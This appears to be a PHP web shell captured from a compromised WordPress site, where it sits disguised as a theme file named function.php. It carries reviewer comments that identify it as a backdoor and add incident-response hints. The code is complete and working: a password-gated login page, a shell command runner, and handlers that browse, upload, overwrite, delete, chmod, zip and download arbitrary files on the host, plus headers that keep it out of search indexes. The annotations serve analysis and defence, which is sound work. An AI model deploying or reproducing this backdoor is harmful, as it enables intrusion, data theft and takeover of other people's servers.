Server: Apache
System: Linux server-634962.emtiyz.com 5.14.0-611.11.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 3 09:47:37 EST 2025 x86_64
User: codo66ho (1003)
PHP: 8.2.29
Disabled: exec,passthru,shell_exec,system
File: /home/codo66ho/public_html/aamcc.emtiyz.com/wp-content/themes/consultar/function.php
<?php
// NOTE(review): this script is a password-gated file manager with a shell-command runner
// (see the "Run command" handler further down). Found unexpectedly on a web server, it
// should be treated as a web shell and the host handled as compromised.

// Ask crawlers not to index, cache or excerpt this page, which keeps it out of search results.
header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet', true);
// Login state and the failed-attempt counters below are kept in the PHP session.
session_start();
// bcrypt hash the submitted password is checked against with password_verify().
$AUTH_HASH = '$2b$12$.IczryltFMrAdWzQsSeyQuD8FdYUj0Wa1fUNQSbo7fNQUYilg/GIC';
// Name shown in the login page title and heading.
$APP_NAME  = 'Protected FM';
// Failed attempts allowed before a lockout, and the lockout length in seconds.
$MAX_TRIES = 5;
$LOCK_SECS = 300;

// Initialise the per-session counters on the first visit.
$_SESSION['tries'] = $_SESSION['tries'] ?? 0;
$_SESSION['locked_until'] = $_SESSION['locked_until'] ?? 0;

// Login gate: every request without an authenticated session ends inside this block
// (it renders the login form and exits), so the handlers below are reachable only after
// a successful password check.
if (empty($_SESSION['fm_logged_in']) || $_SESSION['fm_logged_in'] !== true) {
    $now = time();
    // Lock state is evaluated before the current attempt is processed.
    $locked = $now < (int)$_SESSION['locked_until'];

    if (!$locked && isset($_POST['password'])) {
        if (password_verify($_POST['password'], $AUTH_HASH)) {
            // New session id on login, then reset the counters and reload the same URL via GET.
            session_regenerate_id(true);
            $_SESSION['fm_logged_in'] = true;
            $_SESSION['tries'] = 0;
            $_SESSION['locked_until'] = 0;
            header('Location: ' . $_SERVER['REQUEST_URI']);
            exit;
        } else {
            // Count the failure; the counter and the lockout timestamp live in the session only.
            $_SESSION['tries']++;
            if ($_SESSION['tries'] >= $MAX_TRIES) {
                $_SESSION['locked_until'] = $now + $LOCK_SECS;
            }
        }
    }

    // Seconds left on the lockout, shown in the form below.
    $remaining = max(0, (int)$_SESSION['locked_until'] - $now);
    ?>
    <!DOCTYPE html>
    <html lang="id">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <title><?= htmlspecialchars($APP_NAME) ?> — Login</title>
        <style>
            :root{color-scheme:dark light}
            body{font-family:system-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,"Helvetica Neue",Arial;margin:0;min-height:100vh;display:grid;place-items:center;background:#0f1115;color:#eaeaea}
            .card{width:clamp(280px,90vw,360px);background:#151922;border:1px solid #242a36;border-radius:14px;padding:22px;box-shadow:0 6px 24px rgba(0,0,0,.25)}
            h1{margin:0 0 12px;font-size:18px}
            .muted{color:#9aa3b2;font-size:13px;margin:0 0 16px}
            input[type=password]{width:100%;padding:12px 0px;border:1px solid #2c3342;border-radius:10px;background:#0f1320;color:#eaeaea;font-size:14px}
            button{width:100%;margin-top:12px;padding:12px 14px;border:1px solid #39ff14;background:#121a12;color:#caffd3;border-radius:10px;cursor:pointer}
            button:hover{filter:brightness(1.08)}
            .err{margin-top:10px;color:#ff6b6b;font-size:13px}
            .lock{margin-top:10px;color:#ffa94d;font-size:13px}
        </style>
    </head>
    <body>
        <form class="card" method="post" autocomplete="off">
            <h1><?= htmlspecialchars($APP_NAME) ?></h1>
            <p class="muted">Masukkan password untuk melanjutkan.</p>
            <input type="password" name="password" placeholder="Password" required <?= $locked ? 'disabled' : '' ?>>
            <button type="submit" <?= $locked ? 'disabled' : '' ?>>Login</button>
            <?php if (!$locked && isset($_POST['password'])): ?>
                <div class="err">Password salah. Percobaan <?= (int)$_SESSION['tries'] ?>/<?= (int)$MAX_TRIES ?>.</div>
            <?php endif; ?>
            <?php if ($locked): ?>
                <div class="lock">Terkunci. Coba lagi dalam <?= (int)$remaining ?> detik.</div>
            <?php endif; ?>
        </form>
    </body>
    </html>
    <?php
    // Stop here so nothing below the gate runs for an unauthenticated request.
    exit;
}

/**
 * Render a byte count with a binary unit suffix (B, KB, MB, GB, TB).
 *
 * Values below 1024 are printed as given; larger values are scaled by 1024 per step
 * and printed with two decimals. TB is the largest unit, so bigger values stay in TB.
 *
 * @param int|float $bytes Size in bytes.
 * @return string Size followed by a space and the unit.
 */
function formatSize($bytes) {
    $labels = ['B', 'KB', 'MB', 'GB', 'TB'];
    $last = count($labels) - 1;

    // Scale down until the value fits the unit or the largest unit is reached.
    for ($idx = 0; $bytes >= 1024 && $idx < $last; $idx++) {
        $bytes /= 1024;
    }

    if ($idx === 0) {
        // Plain bytes are shown without decimals or thousands separators.
        return $bytes . ' ' . $labels[0];
    }
    return number_format($bytes, 2) . ' ' . $labels[$idx];
}

/**
 * Convert a numeric file mode (as returned by fileperms()) into an ls-style string
 * such as "-rw-r--r--" or "drwxr-xr-x".
 *
 * @param int $perms Mode bits including the file-type bits.
 * @return string Ten characters: one type flag followed by three rwx triplets.
 */
function permsToString($perms) {
    // File-type masks, checked in this order; the first mask fully contained in $perms wins.
    $typeMasks = [
        0xC000 => 's', // Socket
        0xA000 => 'l', // Symlink
        0x8000 => '-', // Regular
        0x6000 => 'b', // Block
        0x4000 => 'd', // Dir
        0x2000 => 'c', // Char
        0x1000 => 'p', // FIFO
    ];
    $text = 'u'; // Unknown unless a mask matches
    foreach ($typeMasks as $mask => $symbol) {
        if (($perms & $mask) === $mask) {
            $text = $symbol;
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit (setuid / setgid / sticky),
    // and the letters used when the special bit is set with / without execute.
    $classes = [
        [0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'], // Owner
        [0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'], // Group
        [0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'], // World
    ];
    foreach ($classes as [$read, $write, $exec, $special, $lower, $upper]) {
        $text .= ($perms & $read) ? 'r' : '-';
        $text .= ($perms & $write) ? 'w' : '-';
        if ($perms & $special) {
            $text .= ($perms & $exec) ? $lower : $upper;
        } else {
            $text .= ($perms & $exec) ? 'x' : '-';
        }
    }

    return $text;
}

/**
 * Build the rows of the file table: one entry per item in $dir ("." and ".." excluded),
 * sorted with directories first and then case-insensitively by name.
 *
 * Each entry carries name, full path, is_dir, a formatted size, a permission string,
 * owner, group and two formatted timestamps.
 *
 * @param string $dir Directory to enumerate.
 * @return array List of associative arrays; empty when the directory cannot be read.
 */
function listDirectory($dir) {
    // Errors are suppressed with @ throughout, so unreadable entries fall back to placeholders.
    $items = @scandir($dir);
    if ($items === false) return [];
    $out = [];
    foreach ($items as $name) {
        if ($name === '.' || $name === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $name;
        $isDir = is_dir($path);
        $size = $isDir ? '-' : @filesize($path);
        $perms = @fileperms($path);
        // Resolve uid/gid to names when the posix extension is available, else show the number.
        // "??" binds tighter than "?:", so the numeric fallback applies inside the true branch.
        $owner = function_exists('posix_getpwuid') ? @posix_getpwuid(@fileowner($path))['name'] ?? @fileowner($path) : @fileowner($path);
        $group = function_exists('posix_getgrgid') ? @posix_getgrgid(@filegroup($path))['name'] ?? @filegroup($path) : @filegroup($path);
        $mtime = @filemtime($path);
        // filectime() is the inode change time on Unix filesystems, not a true creation time,
        // even though the entry below is labelled "creation_time".
        $ctime = @filectime($path);
        $out[] = [
            'name' => $name,
            'path' => $path,
            'is_dir' => $isDir,
            // A failed filesize() (false) is shown as 0 bytes.
            'size' => $isDir ? '-' : formatSize($size ?: 0),
            'permissions' => $perms ? permsToString($perms) : 'n/a',
            'owner' => $owner,
            'group' => $group,
            'last_modified' => $mtime ? date('Y-m-d H:i:s', $mtime) : '-',
            'creation_time' => $ctime ? date('Y-m-d H:i:s', $ctime) : '-',
        ];
    }
    usort($out, function($a, $b) {
        // dirs first, then by name
        if ($a['is_dir'] !== $b['is_dir']) return $a['is_dir'] ? -1 : 1;
        return strcasecmp($a['name'], $b['name']);
    });
    return $out;
}

/**
 * Stream a file to the client as an attachment.
 *
 * @param string $file Path of the file to send.
 * @return bool false when the path is not a readable regular file, true after the body was sent.
 */
function forceDownload($file) {
    if (!is_file($file) || !is_readable($file)) return false;
    // Generic binary content type plus an attachment disposition, so the browser saves the
    // file under its base name instead of rendering it.
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Content-Length: ' . filesize($file));
    // Writes the file contents straight to the response.
    readfile($file);
    return true;
}

/**
 * Pack a single file or a whole directory tree into a new ZIP archive.
 *
 * @param string $path    File or directory to archive.
 * @param string $zipName Path of the archive to create (an existing file is overwritten).
 * @return bool false when ZipArchive is unavailable, the archive cannot be opened or $path
 *              does not resolve; true otherwise. The results of addFile() and close() are
 *              not checked, so true does not guarantee a complete archive.
 */
function zipPath($path, $zipName) {
    if (!class_exists('ZipArchive')) return false;
    $zip = new ZipArchive();
    if ($zip->open($zipName, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) return false;

    // Canonical path; also used below to strip the prefix from entry names.
    $path = realpath($path);
    if ($path === false) { $zip->close(); return false; }

    if (is_dir($path)) {
        // SELF_FIRST yields each directory before its contents.
        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        foreach ($files as $file) {
            // NOTE(review): the realpath() result is used without a check for false.
            $filePath = realpath($file);
            // Entry name relative to the archived directory.
            $localName = substr($filePath, strlen($path) + 1);
            if (is_dir($filePath)) {
                $zip->addEmptyDir($localName);
            } else {
                $zip->addFile($filePath, $localName);
            }
        }
    } else {
        $zip->addFile($path, basename($path));
    }
    $zip->close();
    return true;
}

// ===================== STATE & ACTIONS =======================
// Working directory: taken from the POSTed hidden "directory" field when present, otherwise
// the script's current working directory. Nothing restricts it to the web root, so the
// handlers below act wherever the PHP process user has filesystem access.
$directory = isset($_POST['directory']) ? $_POST['directory'] : getcwd();
if (!is_dir($directory)) $directory = getcwd();
// Canonicalise the path; fall back to the cwd if that fails.
$directory = realpath($directory) ?: getcwd();

// Text for the "Output" panel, and the path / content of the file loaded into the editor.
$output = '';
$selectedFilePath = '';
$fileContent = '';

// File download (GET ?download=<path>): streams the named file to the client.
// In web-server access logs this appears as a GET request whose query string carries a
// filesystem path in the "download" parameter.
if (isset($_GET['download'])) {
    $target = $_GET['download'];
    // String-prefix comparison of the resolved target against $directory; a target that
    // does not resolve becomes '' and is answered with 403.
    if (strpos(realpath($target) ?: '', $directory) !== 0) {
        http_response_code(403); exit('Forbidden');
    }
    if (!forceDownload($target)) {
        http_response_code(404); exit('Not found');
    }
    exit;
}

// Go Back: move the working directory one level up when the parent exists.
if (isset($_POST['back'])) {
    $parent = dirname($directory);
    if ($parent && is_dir($parent)) $directory = $parent;
}

// Change directory/open: switch to any existing directory named in the POSTed "openDir"
// field (typed into the form or sent by an "Open" button); the path is not limited to
// the current tree.
if (isset($_POST['openDir'])) {
    $new = $_POST['openDir'];
    if (is_dir($new)) $directory = realpath($new) ?: $directory;
}

// Run command: hands the POSTed "cmd" string to the system shell unmodified and captures
// stdout and stderr (the appended "2>&1") for the Output panel. This is the remote
// command-execution capability of the script; commands run as the PHP process user.
// NOTE(review): shell_exec() is unavailable when it is listed in php.ini disable_functions,
// so on such hosts this handler cannot run anything. The command travels in the POST body,
// which standard access logs do not record; request-body logging or a WAF rule is needed
// to see it.
if (isset($_POST['cmd'])) {
    $cmd = trim((string)$_POST['cmd']);
    $output = shell_exec($cmd . ' 2>&1');
}

// Edit file, step 1: load any readable file named in the POSTed "file" field into the editor.
if (isset($_POST['file'])) {
    $selectedFilePath = $_POST['file'];
    if (is_file($selectedFilePath) && is_readable($selectedFilePath)) {
        $fileContent = file_get_contents($selectedFilePath);
    }
}
// Edit file, step 2 ("Save"): overwrite the file at the POSTed path with the POSTed content.
// The path is not tied to $directory, so any existing file writable by the PHP process
// user can be replaced, including other PHP scripts of the site.
// NOTE(review): for incident response, files changed while this script was present should
// be compared against known-good copies rather than trusted.
if (isset($_POST['edit']) && isset($_POST['selectedFilePath'])) {
    $p = $_POST['selectedFilePath'];
    if (is_file($p) && is_writable($p)) {
        file_put_contents($p, (string)$_POST['fileContent']);
        $selectedFilePath = $p;
        // Re-read so the editor shows what is actually on disk after the write.
        $fileContent = file_get_contents($p);
        $output = "[OK] Saved: " . $p;
    } else {
        $output = "[ERR] Cannot write: " . $p;
    }
}

// Delete file/dir: both handlers take an absolute path from the request and are not
// limited to $directory.
if (isset($_POST['deleteFile'])) {
    $p = $_POST['deleteFile'];
    if (is_file($p) && @unlink($p)) $output = "[OK] Deleted file: $p";
    else $output = "[ERR] Delete file failed: $p";
}
if (isset($_POST['deleteDir'])) {
    $p = $_POST['deleteDir'];
    $ok = false;
    if (is_dir($p)) {
        // recursive remove; CHILD_FIRST yields contents before the directory that holds them
        $it = new RecursiveDirectoryIterator($p, FilesystemIterator::SKIP_DOTS);
        $files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
        $ok = true;
        foreach ($files as $file) {
            // "&&" short-circuits: once one removal fails, later entries are not attempted.
            $ok = $ok && ( $file->isDir() ? @rmdir($file->getRealPath()) : @unlink($file->getRealPath()) );
        }
        $ok = $ok && @rmdir($p);
    }
    $output = $ok ? "[OK] Deleted dir: $p" : "[ERR] Delete dir failed: $p";
}

// Rename: the new name is appended to the source's parent directory exactly as submitted
// (no basename() is applied to "renameTo").
if (isset($_POST['renameFrom'], $_POST['renameTo'])) {
    $from = $_POST['renameFrom'];
    // Dead assignment: overwritten on the next line, and no form on this page sends
    // "namePrefix". The "?? ''" applies to the whole concatenation, so it never takes effect.
    $to = dirname($from) . DIRECTORY_SEPARATOR . $_POST['namePrefix'] ?? '';
    $to = dirname($from) . DIRECTORY_SEPARATOR . $_POST['renameTo'];
    $output = @rename($from, $to) ? "[OK] Renamed to: $to" : "[ERR] Rename failed";
}

// CHMOD: the submitted text is read as an octal number and applied to the given path.
// NOTE(review): unexpected mode changes on site files (for example newly world-writable
// or executable files) are a useful integrity signal.
if (isset($_POST['chmodPath'], $_POST['chmodValue'])) {
    $p = $_POST['chmodPath'];
    $val = octdec($_POST['chmodValue']);
    $output = @chmod($p, $val) ? "[OK] chmod $p to " . $_POST['chmodValue'] : "[ERR] chmod failed";
}

// ZIP: archive the given file or directory. The archive is written next to the target as
// "<target>_<YYYYMMDD_HHMMSS>.zip".
// NOTE(review): archives with that name pattern beside site directories are an artifact
// worth searching for when scoping what was packaged for download.
if (isset($_POST['zipPath'])) {
    $zp = $_POST['zipPath'];
    $zipName = $zp . '_' . date('Ymd_His') . '.zip';
    $ok = zipPath($zp, $zipName);
    $output = $ok ? "[OK] ZIP created: $zipName" : "[ERR] ZIP failed (ZipArchive missing?)";
}

// Create new file/dir: basename() keeps the new entry inside the current working directory.
if (isset($_POST['newFile']) && !empty($_POST['newFile'])) {
    $p = $directory . DIRECTORY_SEPARATOR . basename($_POST['newFile']);
    // Writes an empty file; an existing file of that name is truncated.
    $output = @file_put_contents($p, '') !== false ? "[OK] Created file: $p" : "[ERR] Create file failed";
}
if (isset($_POST['newDir']) && !empty($_POST['newDir'])) {
    $p = $directory . DIRECTORY_SEPARATOR . basename($_POST['newDir']);
    $output = @mkdir($p, 0755, true) ? "[OK] Created dir: $p" : "[ERR] Create dir failed";
}

// Upload: stores the uploaded file in the working directory under its client-supplied base
// name. There is no extension or content check, so any file type, including further PHP
// scripts, can be placed wherever $directory points.
// NOTE(review): file-integrity monitoring on the web root and denying PHP execution in
// upload-only directories are the usual controls against this kind of drop.
if (isset($_POST['upload']) && isset($_FILES['uploadFile'])) {
    $tmp = $_FILES['uploadFile']['tmp_name'] ?? '';
    $name = basename($_FILES['uploadFile']['name'] ?? '');
    if (is_uploaded_file($tmp) && $name) {
        $dest = $directory . DIRECTORY_SEPARATOR . $name;
        $output = @move_uploaded_file($tmp, $dest) ? "[OK] Uploaded: $dest" : "[ERR] Upload failed";
    } else {
        $output = "[ERR] No file uploaded";
    }
}

// Prepare listing: rows for the file table rendered below, reflecting any changes made above.
$fileDetails = listDirectory($directory);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>PHP Terminal & File Manager</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet">
    <style>
        body { background:#0b0b0b; color:#e2e2e2; font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, "Liberation Mono", monospace; margin:0; padding:20px; }
        h1 { margin:0 0 10px; color:#39ff14; font-size:20px; }
        .path { color:#9bd38c; margin:0 0 10px; word-break:break-all; }
        form.inline { display:inline; }
        input[type="text"], input[type="file"], input[type="password"], select, textarea {
            background-color: #1a1a1a; color: #00ff00; border: 1px solid #333; padding: 8px; font-size: 14px; border-radius: 4px;
        }
        input[type="submit"], button {
            background-color: #111; border: 1px solid #39ff14; cursor: pointer; transition: all 0.2s ease-in-out; margin-left: 5px; padding:8px 10px; border-radius:4px; color:#39ff14;
        }
        input[type="submit"]:hover, button:hover { background-color:#39ff14; color:#000; }
        textarea { width: 100%; max-width: 100%; min-height: 300px; resize: vertical; }
        table { width: 100%; border-collapse: collapse; margin-top: 20px; font-size: 14px; }
        th, td { padding: 10px; text-align: left; border: 1px solid #333; }
        thead { background-color: #1f1f1f; }
        tbody tr:hover { background-color: #262626; }
        pre { background-color: #0f0f0f; padding: 15px; border: 1px solid #333; border-radius: 4px; overflow-x: auto; color:#d9fdd3; }
        table form { display: inline-block; margin-right: 5px; }
        ul { list-style: none; padding-left: 0; }
        ul li { padding: 4px 0; }
        .bar { display:flex; gap:10px; flex-wrap:wrap; align-items:center; margin:10px 0 16px; }
        .muted { color:#9aa3b2; }
        @media (max-width: 768px) {
            table, thead, tbody, th, td, tr { display: block; }
            th, td { text-align: right; padding-left: 50%; position: relative; }
            th::before, td::before { position: absolute; top: 50%; left: 10px; transform: translateY(-50%); font-weight: bold; white-space: nowrap; }
            th:nth-child(1)::before { content: "Name"; }
            th:nth-child(2)::before { content: "Size"; }
            th:nth-child(3)::before { content: "Permissions"; }
            th:nth-child(4)::before { content: "Owner"; }
            th:nth-child(5)::before { content: "Group"; }
            th:nth-child(6)::before { content: "Modified"; }
            th:nth-child(7)::before { content: "Created"; }
            th:nth-child(8)::before { content: "Actions"; }
        }
    </style>
</head>
<body>
    <h1>PHP Terminal & File Manager</h1>
    <div class="path">Dir: <?= htmlspecialchars($directory) ?></div>

    <div class="bar">
        <form method="post" class="inline">
            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
            <input type="submit" name="back" value="Go Back">
        </form>

        <form method="post" class="inline">
            <input type="text" name="openDir" placeholder="Open directory path" style="min-width:320px" required>
            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
            <input type="submit" value="Open">
        </form>

        <form method="post" enctype="multipart/form-data" class="inline">
            <input type="file" name="uploadFile" required>
            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
            <input type="submit" name="upload" value="Upload">
        </form>
    </div>

    <form method="post">
        <input type="text" name="cmd" placeholder="Shell command" required style="min-width:420px">
        <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
        <input type="submit" value="Run">
    </form>

    <h3>System Info</h3>
    <ul>
        <li>OS: <?= php_uname() ?></li>
        <li>PHP: <?= phpversion() ?></li>
        <li>Disk: 
            <?php
                $total = @disk_total_space($directory);
                $free  = @disk_free_space($directory);
                if ($total !== false && $free !== false) {
                    echo formatSize($total - $free) . " used / " . formatSize($total);
                } else {
                    echo "n/a";
                }
            ?>
        </li>
    </ul>

    <?php if ($output !== ''): ?>
        <h3>Output</h3>
        <pre><?= htmlspecialchars($output) ?></pre>
    <?php endif; ?>

    <?php if ($selectedFilePath): ?>
        <h3>Editing: <?= htmlspecialchars($selectedFilePath) ?></h3>
        <form method="post">
            <textarea name="fileContent" rows="20" cols="100"><?= htmlspecialchars($fileContent) ?></textarea>
            <input type="hidden" name="selectedFilePath" value="<?= htmlspecialchars($selectedFilePath) ?>">
            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
            <input type="submit" name="edit" value="Save">
        </form>
        <hr>
    <?php endif; ?>

    <h3>Create New</h3>
    <form method="post" class="inline">
        <input type="text" name="newFile" placeholder="new_file.txt">
        <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
        <input type="submit" value="Create File">
    </form>
    <form method="post" class="inline">
        <input type="text" name="newDir" placeholder="new_directory">
        <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
        <input type="submit" value="Create Dir">
    </form>

    <h3>Files</h3>
    <table>
        <thead>
            <tr>
                <th>Name</th>
                <th style="width:100px;">Size</th>
                <th>Permissions</th>
                <th>Owner</th>
                <th>Group</th>
                <th>Modified</th>
                <th>Created</th>
                <th style="min-width:320px;">Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php foreach ($fileDetails as $f): ?>
                <tr>
                    <td><?= htmlspecialchars($f['name']) ?></td>
                    <td><?= $f['size'] ?></td>
                    <td><?= $f['permissions'] ?></td>
                    <td><?= $f['owner'] ?></td>
                    <td><?= $f['group'] ?></td>
                    <td><?= $f['last_modified'] ?></td>
                    <td><?= $f['creation_time'] ?></td>
                    <td>
                        <?php if ($f['is_dir']): ?>
                            <form method="post" class="inline">
                                <input type="hidden" name="openDir" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="Open">
                            </form>
                            <form method="post" class="inline" onsubmit="return confirm('Delete directory recursively?')">
                                <input type="hidden" name="deleteDir" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="Delete">
                            </form>
                            <form method="post" class="inline">
                                <input type="hidden" name="zipPath" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="ZIP">
                            </form>
                        <?php else: ?>
                            <a href="?download=<?= urlencode($f['path']) ?>" title="Download">⬇</a>
                            <form method="post" class="inline">
                                <input type="hidden" name="file" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="Edit">
                            </form>
                            <form method="post" class="inline" onsubmit="return confirm('Delete file?')">
                                <input type="hidden" name="deleteFile" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="Delete">
                            </form>
                            <form method="post" class="inline">
                                <input type="hidden" name="zipPath" value="<?= htmlspecialchars($f['path']) ?>">
                                <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                                <input type="submit" value="ZIP">
                            </form>
                        <?php endif; ?>

                        <form method="post" class="inline">
                            <input type="text" name="renameTo" placeholder="New name" required style="width:140px">
                            <input type="hidden" name="renameFrom" value="<?= htmlspecialchars($f['path']) ?>">
                            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                            <input type="submit" value="Rename">
                        </form>

                        <form method="post" class="inline">
                            <input type="text" name="chmodValue" placeholder="e.g. 0755" required style="width:90px">
                            <input type="hidden" name="chmodPath" value="<?= htmlspecialchars($f['path']) ?>">
                            <input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
                            <input type="submit" value="CHMOD">
                        </form>
                    </td>
                </tr>
            <?php endforeach; ?>
        </tbody>
    </table>
</body>
</html>